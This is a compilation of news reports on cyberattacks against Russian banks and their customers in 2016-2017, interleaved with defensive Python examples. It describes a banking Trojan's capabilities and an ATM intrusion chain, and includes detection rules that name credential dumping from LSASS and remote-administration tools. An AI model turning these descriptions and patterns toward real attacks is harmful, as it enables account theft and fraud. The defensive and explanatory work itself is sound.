On January 27, 2017, Yandex reported in the media that users' confidential bank card data is being stolen via browser extensions. Cybercriminals have learned to steal data by distributing malicious plug-ins from more than 80 thousand websites on the internet.

The infected extensions purport to supply users with useful information, such as currency rates or a weather forecast, without visiting dedicated websites. Such programs are distributed through extension stores or from unverified sources, and can run in both desktop and mobile versions of browsers[18].

Advertising of MIR cards (2015)

By installing unverified malicious plug-ins, the user opens access for cyber fraudsters to passwords, logins and bank card data. According to Yandex representatives, 1.24 million users encounter such problems every month.

To protect against this type of threat, in addition to the general recommendations, only legitimate extensions from official stores should be used. These threats fall into two kinds: the threat of a personal computer being infected with malware that steals payment card data during online payment, and the threat of infection of the device from which the bank account is managed online (internet bank, mobile bank).

Nikolay Pyatiizbyantsev, head of the incident management unit of the information security department of Gazprombank

The first type of threat, according to the expert, can be neutralized by using 3D-Secure technology.

A fraudster who has stolen all the card data and the one-time password will not be able to use them for the next transaction. Some banks give cardholders the right to prohibit operations without this technology. It should be borne in mind that the infected computer and the mobile device that receives the one-time SMS password are different devices.

The second type of threat is much more serious, and it is difficult to protect against.

In this case the following can be recommended:

  • the mobile phone that receives one-time SMS passwords should not be used for online banking (mobile bank);
  • a separate device (computer, smartphone or tablet) should be allocated for accessing and managing the bank account;
  • this device should not be used for any other purpose besides online banking, including browsing web pages, social networks or e-mail;
  • special software implementing a "default deny" or "whitelist" policy should be installed on the device (everything that is not permitted is prohibited).
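The point made above about 3D-Secure, that a stolen card number plus an intercepted one-time code cannot be reused for another transaction, rests on the code being single-use and bound to one specific payment. The Python below is an added, simplified illustration of that binding on the issuer's side (a toy model, not the 3-D Secure protocol itself and not any bank's code); the class name, the HMAC derivation, the kopeck amounts and the time-to-live are assumptions of the example.

```python
import hashlib
import hmac
import secrets
import time


class OtpChallengeService:
    """Toy issuer-side service: one code, one transaction, one use.

    Simplified model for illustration only; it is not the 3-D Secure message flow
    and not any bank's implementation.
    """

    def __init__(self, ttl_seconds=180, clock=time.time):
        self._key = secrets.token_bytes(32)   # issuer secret; never leaves the bank
        self._pending = {}                    # challenge_id -> (binding, expires_at)
        self._ttl = ttl_seconds
        self._clock = clock                   # injectable so expiry can be tested

    @staticmethod
    def _binding(card_last4, merchant, amount_kopecks):
        # The code is derived from the transaction details, so a code intercepted
        # for one payment is useless for a different merchant or amount.
        return f"{card_last4}|{merchant}|{amount_kopecks}".encode()

    def _otp_for(self, challenge_id, binding):
        mac = hmac.new(self._key, challenge_id.encode() + b"|" + binding,
                       hashlib.sha256).digest()
        return f"{int.from_bytes(mac[:4], 'big') % 1_000_000:06d}"

    def issue(self, card_last4, merchant, amount_kopecks):
        """Create a challenge for one payment; returns (challenge_id, otp).

        The otp is what the bank would send by SMS to the cardholder's phone.
        """
        challenge_id = secrets.token_hex(8)
        binding = self._binding(card_last4, merchant, amount_kopecks)
        self._pending[challenge_id] = (binding, self._clock() + self._ttl)
        return challenge_id, self._otp_for(challenge_id, binding)

    def verify(self, challenge_id, card_last4, merchant, amount_kopecks, otp):
        """Accept exactly once, only for the original transaction, only before expiry."""
        # The challenge is consumed on the first attempt, right or wrong, so a code
        # cannot be replayed and cannot be guessed by repeated submission.
        entry = self._pending.pop(challenge_id, None)
        if entry is None:
            return False
        binding, expires_at = entry
        if self._clock() > expires_at:
            return False
        if binding != self._binding(card_last4, merchant, amount_kopecks):
            return False
        return hmac.compare_digest(otp, self._otp_for(challenge_id, binding))


if __name__ == "__main__":
    svc = OtpChallengeService()
    cid, otp = svc.issue("4312", "shop.example", 150_000)
    print("genuine payment:", svc.verify(cid, "4312", "shop.example", 150_000, otp))
    print("replay of the same code:", svc.verify(cid, "4312", "shop.example", 150_000, otp))
```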

Gref: 98.5% of cybercrimes occur in the financial sphere

The share of cybercrimes in the financial sphere in 2016 was 98.5%. German Gref, head of Sberbank of Russia, reported this in January. At the same time Gref emphasized that although the number of crimes committed in cyberspace runs into millions, the number of people convicted for committing them does not exceed several dozen.

"If you look at the allocation of specialists engaged in investigating cybercrimes, the proportion will be almost the reverse: most employees of the investigative bodies are engaged in investigating traditional crimes. Or they try to investigate cybercrimes by traditional methods, and then it (cybercrime) is simply not looked for at all; it is a waste of time and money," TASS quotes Gref.

The head of Sberbank believes that to solve the problem it is necessary to radically rework the training programs for law enforcement specialists, including taking into account the changes planned for introduction into the Criminal Code of the Russian Federation.

The amendments drafted with Sberbank's participation and submitted to the State Duma provide for removing cybercrimes from Article 159 of the Criminal Code of the Russian Federation (Fraud) and including them in Article 158 (Theft), along with tougher punishment: up to 10 years of imprisonment.

Dr.Web: growth of number of the attacks on Android system is expected

On January 20, 2017 analysts of Doctor Web Company sounded the probability of significant increase in number of bank "Trojans" on the Android platform (Android-bankery) and growth of number of the attacks made at their means.

Modern bank Trojans for Android OS are created by virus writers and are on sale as commercial products through underground Internet platforms. At a hacker forum in free access the source code of one of the malware with instructions for its use appeared. Virus analysts of Doctor Web Company believe that it can lead to increase of number of Android-bankerov and growth of number of the attacks made with their help[19].

Screen screenshot before start of the Android.BankBot.33.origin virus, (2016)
Screen screenshot before start of the Android.BankBot.33.origin virus, (2016)

Virus writers published the source code of the malware in December, 2016, and specialists of Doctor Web Company detected Android-bankera created on the basis of information provided by cyber-criminals.

This Trojan under the name of Android.BankBot.149.origin extends under the guise of harmless programs. After loading on the smartphone, the tablet and installations, the banker requests access to functions of the administrator of the mobile device to complicate the removal. Then hides from the user, removing the icon from the main screen. Then the virus is connected to the managing server and expects commands.

The Trojan can perform operations:

  • send Sms;
  • intercept Sms;
  • request the administrator's rights;
  • execute USSD requests;
  • receive the list of numbers of all available contacts from the telephone directory;
  • send the SMS with the text on all numbers received in a command from the telephone directory;
  • keep track of location of the device via the GPS satellites;
  • request on devices with modern versions of Android OS additional permission to sending Sms,
  • accomplishment of calls,
  • access to the telephone directory
  • work with the GPS receiver;
  • receiving a configuration file with the list of the attacked banking applications;
  • demonstration of phishing windows.

The Trojan steals confidential information from users, monitoring applications launch "bank client" and software for work with payment systems. The sample investigated by virus analysts Dr.Web controls start more than three tens such programs. As soon as the virus finds out that one of them began work, it loads from the managing server the corresponding phishing entry form of the login and password for access to an account of bank and shows it over the attacked application.

Besides logins and passwords, the Trojan tries to steal the bank card details of the owner of the infected device. To do so it watches for the launch of popular applications such as Facebook, Viber, YouTube, Messenger, WhatsApp, Uber, Snapchat, WeChat, imo, Instagram, Twitter and Play Market, and overlays them with a phishing window imitating the payment settings of the Google Play catalog. When an SMS arrives, the Trojan silences all sound and vibration alerts, forwards the message contents to the attackers and tries to delete the intercepted SMS from the inbox. As a result the user may miss not only notifications from credit institutions about unexpected activity on their funds, but also any other messages sent to their number.

The stolen data are uploaded to the C2 server and are available in an administration panel, through which the criminals retrieve information and control the malware. The capabilities of this Trojan are fairly standard for modern Android bankers. However, since the criminals built it from publicly available information, a large number of similar Trojans can be expected.
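The capability set described above (device administrator rights to resist removal, SMS interception, overlay windows drawn over banking apps, access to calls, contacts and GPS) maps directly onto declarations an APK has to carry in its manifest. The script below is an added example of triaging a manifest for that combination; it is not Doctor Web's detection code. The permission names are real Android permissions, while the two manifests, the package names, the weights and the alert threshold are constructed for illustration.

```python
"""Triage of an Android manifest for the capability combination of an overlay
banker (device admin + SMS interception + overlay windows + SMS/call/contact
access). Added example, not Doctor Web's detection code. The permission names
are real Android permissions; the two manifests, the weights and the threshold
are constructed for illustration."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Capabilities the text describes, and the permission an APK must declare to get
# each one. Weights are an assumption: SMS interception and overlay windows are
# rare in legitimate apps, contacts and location are common.
CAPABILITY_WEIGHTS = {
    "sms_send": ("android.permission.SEND_SMS", 2),
    "sms_intercept": ("android.permission.RECEIVE_SMS", 3),
    "contacts": ("android.permission.READ_CONTACTS", 1),
    "gps": ("android.permission.ACCESS_FINE_LOCATION", 1),
    "calls_ussd": ("android.permission.CALL_PHONE", 2),   # USSD codes are dialed via ACTION_CALL
    "overlay": ("android.permission.SYSTEM_ALERT_WINDOW", 3),  # phishing windows over other apps
}
DEVICE_ADMIN_WEIGHT = 3   # a receiver guarded by BIND_DEVICE_ADMIN lets the app resist removal
THRESHOLD = 8             # assumed alert threshold


def triage_manifest(manifest_xml: str) -> dict:
    """Return the package name, the matched capabilities, a score and a verdict."""
    root = ET.fromstring(manifest_xml)
    declared = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    findings, score = {}, 0
    for cap, (perm, weight) in CAPABILITY_WEIGHTS.items():
        if perm in declared:
            findings[cap] = perm
            score += weight
    for recv in root.iter("receiver"):
        if recv.get(ANDROID_NS + "permission") == "android.permission.BIND_DEVICE_ADMIN":
            findings["device_admin"] = recv.get(ANDROID_NS + "name")
            score += DEVICE_ADMIN_WEIGHT
            break
    # The triad below is the signature of an overlay banker; each part alone is
    # found in legitimate software, so the combination counts on its own.
    banker_pattern = {"overlay", "sms_intercept", "device_admin"}.issubset(findings)
    return {"package": root.get("package"), "findings": findings, "score": score,
            "suspicious": score >= THRESHOLD or banker_pattern}


# Constructed manifest of a dropper posing as a media player (package name invented).
BANKER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashplayer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application>
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed manifest of an ordinary messenger: contacts and media, nothing else.
MESSENGER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.chat">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <application/>
</manifest>"""

if __name__ == "__main__":
    for manifest in (BANKER_MANIFEST, MESSENGER_MANIFEST):
        r = triage_manifest(manifest)
        print(r["package"], "SUSPICIOUS" if r["suspicious"] else "ok",
              "score", r["score"], sorted(r["findings"]))
```

The point of the pattern check is that no single permission is damning: messengers read contacts, navigation apps use GPS, and many launchers draw overlays. It is the co-occurrence of device admin, SMS interception and overlay windows in one package that has no honest use.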

Main security problems of mobile and Internet banking

The security problems of mobile and Internet banking have been known for a long time, and newly discovered vulnerabilities, as a rule, do not significantly change the established threat models.

Image:Banki mob int pas.png

Experts agree that the main problems of the last 3-5 years remain the same: an a priori untrusted environment (the mobile device), the risk of infecting the mobile device and the computer over the Internet, insufficient built-in protection in the software products of remote banking service (RBS) and Internet banking vendors, and users' failure to follow basic security requirements.

Alexey Sabanov, deputy CEO of Aladdin R.D., believes the problem can be solved only in those banks where the IT, information security and business divisions are qualified enough to assess the losses. When professionals work as one team, he is sure, they always find a solution, whether purely organizational or organizational and technical.

Alexey Sizov, head of anti-fraud at the Information Security Center of Jet Infosystems, names client-side vulnerability as the key problem of using RBS services.

Any security perimeter is directly tied to the client's actions or knowledge. Whatever means of protection or transaction confirmation we give the client, it can be compromised both from outside and by the user himself, Sizov is sure. The relative ease of influencing the client, his trustfulness, lack of awareness and carelessness in handling security tools allow attackers to bypass even the most advanced protection.

At the same time, the use of mobile platforms only reduces the resistance of products and service channels to fraud. If a PC and a mobile phone are used together to perform transactions (formally two independent channels), a certain degree of security is provided; when both the authentication method and the payment confirmation are combined in one device and one application, that threshold is lowered.

Some address this by reducing the set of permitted transactions or setting limits on such platforms, but most do not distinguish classic web banking from mobile banking in terms of risk. Unfortunately, this is why attacks on mobile platforms are showing the fastest growth today, the expert notes.

Another problem is the growing share of social engineering in attackers' schemes against clients. On the one hand, this indicates that the technical side of banking services has become more secure; on the other, it shows how simple and vulnerable the client side is.

If yesterday "social engineering" was used only to obtain part of the client's data, and the attack itself was carried out without the client's involvement, today the phrase "but I did it myself" is heard from clients more and more often. Today social engineering is not only a way to perform a single illegitimate operation, but also a way to gain full access to the account or payment instrument, which "nullifies" many technical aspects of protection against attackers, Alexey Sizov believes.

Maxim Nikitin, managing partner of Maykor-BTE, counts among the typical security problems of mobile and Internet banking the insufficient level of data encryption and the possibility of running a mobile application on public Internet networks where traffic interception is likely.

The solution lies on the surface: developing and deploying improved encryption systems and testing applications for resistance to attacks in public places, he believes.

Dmitry Demidov, head of the CRM department at NORBIT (part of LANIT group), sees a major security problem in the means of authorization. In particular, he notes that simple authorization via a code received by SMS is easily broken. However, other authorization methods greatly complicate the activation of mobile and Internet banking.

Banks solve this problem in different ways: activation at ATMs or in branches. Several projects to create such tools, both with a hardware component and purely software-based, are under way. I very much hope this problem will be solved, he says.

In addition, mobile applications are often developed in a very short time. Perhaps few people have yet seriously studied the tamper resistance of mobile applications, Demidov believes.

I believe that speed of feature delivery may be put first, to the detriment of working through security issues. It is possible that we will still hear in the news about mobile applications being hacked, the expert notes.

At the same time Vitaly Pateshman, sales director of BSS, speaking about the growing relevance of RBS security, notes that Group-IB, an expert in preventing and investigating cybercrime and high-tech fraud, conducted a security audit of the BSS RBS platform which showed that these solutions have a high degree of security today.

In addition we implemented new capabilities by integrating Group-IB's solution and SafeTech's solutions into our product, the BSS representative says.

Maxim Bolyshev, associate director of the RS-Bank banking software department at R-Style Softlab, identifies three main security problems. First, the security of Internet banking is at odds with ease of use, so banks are forced to find a compromise between convenience and security. Second, the high cost of electronic signatures for individuals, which is why they have not become widespread among this user group. Third, the large number of diverse malware for mobile devices and the absence of a universal solution that guarantees absolute security for both the bank and the client.

Yury Terekhin, director for work with financial institutions at FORS group, names as the main problem the growth in the number of hacker attacks alongside a decline in their professional level.

In his view, this is because highly professional hacker groups have shifted from retail to a more profitable sector and started attacking banks and payment systems (SWIFT). At the same time, the high availability of tools for exploiting vulnerabilities allows attacks on retail clients to be carried out by non-professionals or beginner hackers. But since information security is already a well-trodden path for banks, bank losses in this direction presumably are not growing.

Well-known methods of protecting mobile and Internet banking will be further improved to increase the security of clients' funds, Terekhin believes. Multi-factor authorization using biometric data (fingerprint scanning, iris recognition, voice recognition, etc.) will be used more widely.

Mikhail Domalevsky, development manager at the information security department of Softline group, suggests looking at the security of the Russian banking system as a whole. In his view, 2016 was a critical year for cybersecurity in the banking sector. This year people spoke openly about the actions of hackers, fraudsters and other criminals, and about the scale of the damage they do to banks.

Previously banks and their clients rarely suffered serious financial losses directly from hacker attacks; they were protecting themselves above all from "leaks" of the customer base via insiders and trying to keep such information out of the media. Now a bank can actually lose its license because of hacker attacks, the expert says. In response to this challenge, financial institutions are pooling resources and efforts to create their own centers for monitoring and responding to cybersecurity incidents and to develop interbank exchange to combat the cashing out of stolen funds.

According to Domalevsky, the regulator is also doing a lot to protect against hacker attacks. The Central Bank has issued a number of additional regulatory documents on cybersecurity, in particular the provision "On requirements for information security in the payment system of the Bank of Russia". This document obliges banks to report cyber incidents within strict deadlines.

The regulator's creation of its own Center for Monitoring and Response to Computer Attacks in the Financial Sphere (FinCERT), its integration with existing commercial and bank security monitoring centers, and clear rules of interaction between all participants should in the long run reduce the number of targeted attacks by organized cybercrime and bring banks' losses from cyber attacks down to an acceptable level, the Softline representative believes.


Russia leads in the number of mobile banking Trojans

In 2016 the number of malicious installation packages for mobile devices tripled compared with 2015, to 8.5 million worldwide, according to a Kaspersky Lab report. These are programs containing malware which the user installs on the device either knowingly (for example, by buying a dubious application in a store) or unknowingly (an already infected device downloads and installs the application itself)[20].

At the same time Russia led in the number of mobile banking Trojans, i.e. programs designed to steal users' financial information: 4% of mobile users encountered this type of threat. Australia follows with 2.26%. "The most popular mobile banking Trojan, Svpeng, spread mainly in Russia," the company says. A year earlier South Korea led this specialized ranking with 13.8% of all attacked users; Russia was third with 5.1%.

By the share of users attacked by mobile malware of all kinds, Bangladesh led, with 50.09% of smartphone or tablet owners encountering viruses and malware. Iran (46.87%) and Nepal (43.21%) also made the top three, followed by China (which took first place a year earlier, when Nigeria and Syria were also in the top three).

Kaspersky Lab attributed these results to the wide spread in these countries of so-called advertising Trojans, which obtain access to the smartphone's system settings to display advertising. Such programs can also steal financial information or install third-party applications without the user's knowledge.

Positive Technologies: how money is stolen from a bank

On December 16, 2016 Positive Technologies presented a detailed report on the investigation of a banking-sector incident in which several million rubles (in local currency equivalent) were stolen from six ATMs of a financial institution in a single night.

Chance helped avoid heavier losses: the attack tools conflicted with the software of the NCR ATMs, which prevented the attackers from carrying out the cash withdrawal in full.

Positive Technologies experts noted a number of features typical of modern cyber attacks on financial institutions:

  • Attackers increasingly use well-known tools and built-in operating-system functionality. In this case the commercial Cobalt Strike software was used, including its multifunctional Beacon Trojan of the RAT (Remote Access Trojan) class, which provides remote control of systems. Also used: Ammyy Admin, Mimikatz, PsExec, SoftPerfect Network Scanner and TeamViewer.
  • Phishing mailings remain one of the successful attack vectors because of employees' insufficient awareness of cybersecurity. The bank's infrastructure was infected when an employee launched the file documents.exe from a RAR archive sent by e-mail, which contained the malware. The targeted mailing of e-mails imitating financial correspondence and messages from the security service went on for a month. Several employees launched the file from the phishing letters at different times; the infection succeeded on the workstation of one of them because the antivirus there was disabled (or had outdated signature bases).
  • Targeted attacks are becoming more organized and spread out in time. The investigation showed that the attack began in the first week of August. In early September (after gaining a foothold in the infrastructure) the attackers started identifying the workstations of employees responsible for ATM operation and payment card use. Only in early October did the attackers load malware onto the ATMs and steal the money: the operator sent a command to the ATMs, and money mules ("drops") collected the cash at the agreed moment.
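Each of the three stages above leaves a distinct trace on endpoints: an executable started by an archiver out of a temp extraction folder (the documents.exe case), a non-system process opening lsass.exe with the access mask Mimikatz requests, and PsExec, Ammyy Admin, TeamViewer or the SoftPerfect scanner appearing on hosts where they are not expected. The following is an added example of detection rules for that chain run over constructed Sysmon-style events; it is not Positive Technologies' tooling, the event dicts are a simplified stand-in for Sysmon Event ID 1 (process create) and 10 (process access), and every host name, path and user in the sample is constructed.

```python
"""Detection rules for the three stages of the intrusion described above
(attachment execution out of a RAR archive, credential theft from LSASS the way
Mimikatz does it, remote-administration tools used for lateral movement), run
over constructed Sysmon-style events. Added example, not Positive Technologies'
tooling; the event dicts stand in for Sysmon Event IDs 1 and 10, and every
host name, path and user below is constructed."""
from collections import defaultdict

ARCHIVERS = {"winrar.exe", "7zfm.exe", "7z.exe"}
REMOTE_ADMIN = {"psexesvc.exe", "psexec.exe", "aa_v3.exe",   # PsExec, Ammyy Admin
                "teamviewer.exe", "netscan.exe"}              # TeamViewer, SoftPerfect Network Scanner
# Access masks Mimikatz requests on lsass.exe (PROCESS_VM_READ | QUERY_INFORMATION and supersets).
LSASS_SUSPICIOUS_ACCESS = {0x1010, 0x1410, 0x1438, 0x143A, 0x1FFFFF}
LSASS_BENIGN_SOURCES = {"csrss.exe", "services.exe", "wininit.exe", "msmpeng.exe"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_attachment_execution(ev):
    """An .exe started by an archiver from a temp extraction folder."""
    if ev["id"] != 1:
        return None
    image = ev["image"].lower()
    if (basename(ev["parent_image"]) in ARCHIVERS and image.endswith(".exe")
            and ("rar$" in image or "\\temp\\" in image)):
        return "phishing-attachment-execution"
    return None


def rule_lsass_access(ev):
    """A non-system process reading LSASS memory."""
    if ev["id"] != 10 or basename(ev["target_image"]) != "lsass.exe":
        return None
    if (ev["granted_access"] in LSASS_SUSPICIOUS_ACCESS
            and basename(ev["source_image"]) not in LSASS_BENIGN_SOURCES):
        return "credential-dumping"
    return None


def rule_remote_admin_tool(ev):
    """Remote-administration or scanning tool started on a host."""
    if ev["id"] == 1 and basename(ev["image"]) in REMOTE_ADMIN:
        return "remote-admin-tool"
    return None


RULES = (rule_attachment_execution, rule_lsass_access, rule_remote_admin_tool)


def analyze(events):
    """Map each host to the sorted list of techniques observed on it."""
    hits = defaultdict(set)
    for ev in events:
        for rule in RULES:
            tag = rule(ev)
            if tag:
                hits[ev["host"]].add(tag)
    return {host: sorted(tags) for host, tags in hits.items()}


def full_chain_seen(events) -> bool:
    """True when all three stages appear somewhere in the fleet, the pattern of the case."""
    seen = set().union(*analyze(events).values())
    return {"phishing-attachment-execution", "credential-dumping", "remote-admin-tool"} <= seen


# Constructed sample: the first two events are the phished workstation, the third
# is the ATM operator's machine reached by PsExec, the last two are benign noise.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-ACC-07", "user": "ivanov",
     "image": "C:\\Users\\ivanov\\AppData\\Local\\Temp\\Rar$EXa0.123\\documents.exe",
     "parent_image": "C:\\Program Files\\WinRAR\\WinRAR.exe"},
    {"id": 10, "host": "WS-ACC-07", "source_image": "C:\\Windows\\System32\\rundll32.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": 0x1010},
    {"id": 1, "host": "ATM-OPS-02", "user": "SYSTEM",
     "image": "C:\\Windows\\PSEXESVC.exe",
     "parent_image": "C:\\Windows\\System32\\services.exe"},
    {"id": 1, "host": "WS-ACC-07", "user": "ivanov",
     "image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "parent_image": "C:\\Windows\\explorer.exe"},
    {"id": 10, "host": "WS-ACC-07", "source_image": "C:\\Windows\\System32\\svchost.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": 0x1000},
]

if __name__ == "__main__":
    for host, tags in analyze(SAMPLE_EVENTS).items():
        print(host, tags)
    print("full chain:", full_chain_seen(SAMPLE_EVENTS))
```

The rules are deliberately narrow: a PSEXESVC.exe service or a rundll32 handle on LSASS is worth an alert on its own, but the case shows why a per-host view is not enough. The stages were weeks apart and on different machines, so the correlation that matters is fleet-wide and over a long window, which is what `full_chain_seen` checks.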

Attacks on bank clients are fading into the background today, giving way to attacks on banks' network infrastructure. Attackers have realized that not all financial institutions invest enough in security, and some do it only "for show", to comply with mandatory standards.

Maxim Filippov, director of business development at Positive Technologies in Russia

Positive Technologies, November 2016

During the incident investigation Positive Technologies experts collected a set of host and network indicators of compromise, which were sent to the Bank of Russia's FinCERT for dissemination among financial institutions and prevention of similar attacks in the future.

"During the reporting period FinCERT recorded a considerable number of attacks involving substitution of input data for the KBR (Bank of Russia client) automated workstation (modification of the contents of the XML document used to form the electronic message sent to the Bank of Russia). The attack followed this scheme: in most cases the attackers sent the credit institution an e-mail containing malware not detected by antivirus tools …"
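The substitution FinCERT describes happens between the system that forms the payment batch and the workstation that signs and sends it, so the signature is applied to already-modified data. One countermeasure is a seal over the payment fields that the forming system computes and the sending side verifies immediately before signing, with the key kept off the workstation. The script below is an added example of that check; it is not the Bank of Russia's or any vendor's code. The XML layout is a constructed stand-in rather than the real UFEBS/ED101 schema, the account numbers and BICs are invented, and the HMAC key is a demo secret (in production the forming system's own signature, or a key in an HSM, would play this role).

```python
"""Integrity seal over a batch of payment documents between the system that
forms them and the KBR workstation that signs and sends them, so that a
substitution on the workstation is caught before signing. Added example, not
the Bank of Russia's or any vendor's code. The XML layout is a constructed
stand-in (not the real UFEBS/ED101 schema); the key is a constructed demo
secret that in production would not be present on the sending workstation."""
import hashlib
import hmac
from decimal import Decimal
import xml.etree.ElementTree as ET

KEY = b"constructed-demo-key-not-for-production"
FIELDS = ("amount", "payee_acc", "payee_bic")   # the fields an attacker changes

# Constructed batch of two payment orders (accounts and BICs are invented).
ORIGINAL = """<batch id="2016-10-05-001">
  <doc num="101"><amount>150000.00</amount><payee_acc>40702810900000012345</payee_acc><payee_bic>044525225</payee_bic></doc>
  <doc num="102"><amount>72500.50</amount><payee_acc>40817810100000067890</payee_acc><payee_bic>044525593</payee_bic></doc>
</batch>"""
# The substitution FinCERT describes: the payee account of document 101 is
# swapped for a mule account while the amount, and so the batch total, stays the same.
TAMPERED_ACCOUNT = ORIGINAL.replace("40702810900000012345", "40817810999999900001")
# A cruder variant in which the amount itself is changed.
TAMPERED_AMOUNT = ORIGINAL.replace("150000.00", "1500000.00")


def canonical(xml_text: str) -> bytes:
    """Deterministic serialization of the sealed fields; whitespace and element
    order elsewhere in the XML do not affect the seal."""
    root = ET.fromstring(xml_text)
    lines = [root.get("id")]
    for doc in root.findall("doc"):
        lines.append(doc.get("num") + "|" + "|".join(
            f"{f}={(doc.findtext(f) or '').strip()}" for f in FIELDS))
    return "\n".join(lines).encode()


def seal(xml_text: str, key: bytes = KEY) -> str:
    """Computed by the core banking system when the batch is formed."""
    return hmac.new(key, canonical(xml_text), hashlib.sha256).hexdigest()


def verify(xml_text: str, expected_mac: str, key: bytes = KEY) -> bool:
    """Run on the sending side immediately before the batch is signed."""
    return hmac.compare_digest(seal(xml_text, key), expected_mac)


def batch_totals(xml_text: str):
    """Document count and sum: the control totals an operator compares with the register."""
    root = ET.fromstring(xml_text)
    amounts = [Decimal(doc.findtext("amount")) for doc in root.findall("doc")]
    return len(amounts), sum(amounts, Decimal("0"))


if __name__ == "__main__":
    mac = seal(ORIGINAL)
    for name, batch in (("original", ORIGINAL), ("account swapped", TAMPERED_ACCOUNT),
                        ("amount changed", TAMPERED_AMOUNT)):
        count, total = batch_totals(batch)
        print(f"{name:16} docs={count} total={total} seal_ok={verify(batch, mac)}")
```

The account-swap case is the instructive one: the document count and total are identical to the original, so a register reconciliation on totals alone passes, and only the seal over the payee fields fails. The check is only as good as the key's isolation; if the workstation that was compromised can also compute the seal, the attacker re-seals the modified batch.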

Tordow 2.0 banking Trojan tries to obtain root privileges on smartphones

Comodo researchers identified a new version of the Tordow banking malware attacking users in Russia. The Trojan tries to obtain root privileges on the device, which makes fighting it extremely difficult.

Tordow 2.0 can act as ransomware, intercept phone calls and SMS, download and install applications without the user's knowledge, steal logins and passwords, reboot the device and, most dangerously, manipulate banking data and disable mobile antiviruses. Read more here.

SWIFT warned banks about the growing threat of cyber attacks

In December SWIFT's management sent client banks a letter warning of the growing threat of cyber attacks. Reuters obtained a copy of the document[21].

The SWIFT letter also says that hackers have improved their methods of attacking local banking systems. One new tactic involves software that gives hackers access to technical support computers.

"The threats are persistent, sophisticated and adaptive, and they have become the norm," the SWIFT letter says. "Unfortunately, we continue to see cases in which some of our customers are compromised by thieves who then send fraudulent payment instructions through SWIFT, the same type of message that was used to steal funds from Bangladesh Bank."

Rostelecom repelled DDoS attacks on the largest banks and financial institutions of Russia

In December Rostelecom repelled DDoS attacks on five of the largest Russian banks and financial institutions. The repelled attacks had a similar signature: TCP SYN flood. Peak intensity was 3.2 million packets per second, and the longest attack lasted more than 2 hours. All repelled attacks were recorded on December 5, 2016.

Learn more: DDoS attack

Sixfold growth in the number of cyber attacks on Russian banks

In December 2016 the Central Bank of Russia published its Financial Stability Review, reporting a more than sixfold increase in the number of cyber attacks on credit institutions.

According to the Central Bank, from January to September 2016 the number of unauthorized transactions on the accounts of individuals and legal entities via remote banking systems was 103.1 thousand, against 16.9 thousand for the same period of 2015.

The number of cyber attacks on Russian banks grew sixfold

At the same time the volume of successful hacker attacks fell by 25%: whereas in the first three quarters of 2015 criminals managed to steal about 2.16 billion rubles from banks, a year later it was 1.62 billion rubles. In January-September 2016, 1.2 billion rubles were stolen from individuals and about 387 million rubles from legal entities.

The Bank of Russia believes that financial institutions incur losses from cyber fraudsters for the following main reasons:

  • vulnerabilities in IT systems and payment applications;
  • shortcomings in information security and failure to properly comply with the requirements of regulations and industry standards;
  • lack of the necessary coordination among banks in countering mass and typical cyber attacks.

To check online banking systems for vulnerability to cyber attacks, the Central Bank intends to create an interdepartmental working group which, in addition to the regulator's representatives, will include the police, the Ministry of Telecom and Mass Communications, FSTEC and the Ministry of Finance. By 2018 it plans to create a system of standardization, certification and control of banks' online services and to make the corresponding changes to legislation.

In addition, the Central Bank plans to introduce mandatory double confirmation of transactions made through remote channels. As of early December 2016 most credit institutions in Russia identify the client by sending one-time passwords via SMS or by using special electronic USB keys and smart cards.[22]

FSB warned of cyber attacks being prepared against Russian banks

On December 2, 2016 the Federal Security Service (FSB) of the Russian Federation announced forthcoming cyber attacks on Russian banks aimed at destabilizing the national financial system.

The FSB of Russia has received information that foreign intelligence agencies are preparing large-scale cyber attacks starting December 5, 2016 with the aim of destabilizing the financial system of the Russian Federation, including the activity of a number of the largest Russian banks, the agency said.

Foreign intelligence agencies prepare cyber attacks on Russian banks

According to the FSB, the server capacities and command centers for carrying out the attacks are located in the Netherlands and belong to the Ukrainian hosting company BlazingFast.

The security service established that the hacker attacks would be accompanied by mass SMS mailings and provocative publications on social networks and blogs about a crisis of the Russian credit and financial system, bankruptcies and license revocations of a number of leading federal and regional banks.

The attack is expected in several dozen Russian cities, the security service said, adding that measures to neutralize the threats to economic and information security are being taken.[23]

The Central Bank said the regulator is aware of the cyber attacks being prepared against banks and is working with the intelligence agencies to suppress them.[24]

BlazingFast, the company the FSB considers involved in plans for cyber attacks on Russia from the Netherlands, confirmed that it has clients there and will check their possible illegal activity, BlazingFast told RIA Novosti.[25]

We mostly have foreign clients; we have few Russian or Ukrainian clients … Yes, we are in the Netherlands. Since you called and this information has already appeared somewhere, we will now quickly start checking this whole case, the company representative told the agency.

DDoS attacks on large Russian banks

On November 9, 2016 Sberbank repelled a powerful DDoS attack, the bank's press service told RIA Novosti. Experts say Sberbank was not the only target.

The attacks were organized from botnets comprising tens of thousands of machines geographically distributed across several dozen countries, Sberbank reported.

The DDoS attacks on Sberbank's IT systems went on throughout the day, with the intensity increasing: the first attack was recorded in the morning, and the next one, in the evening, already consisted of several stages, each twice as powerful as the previous.

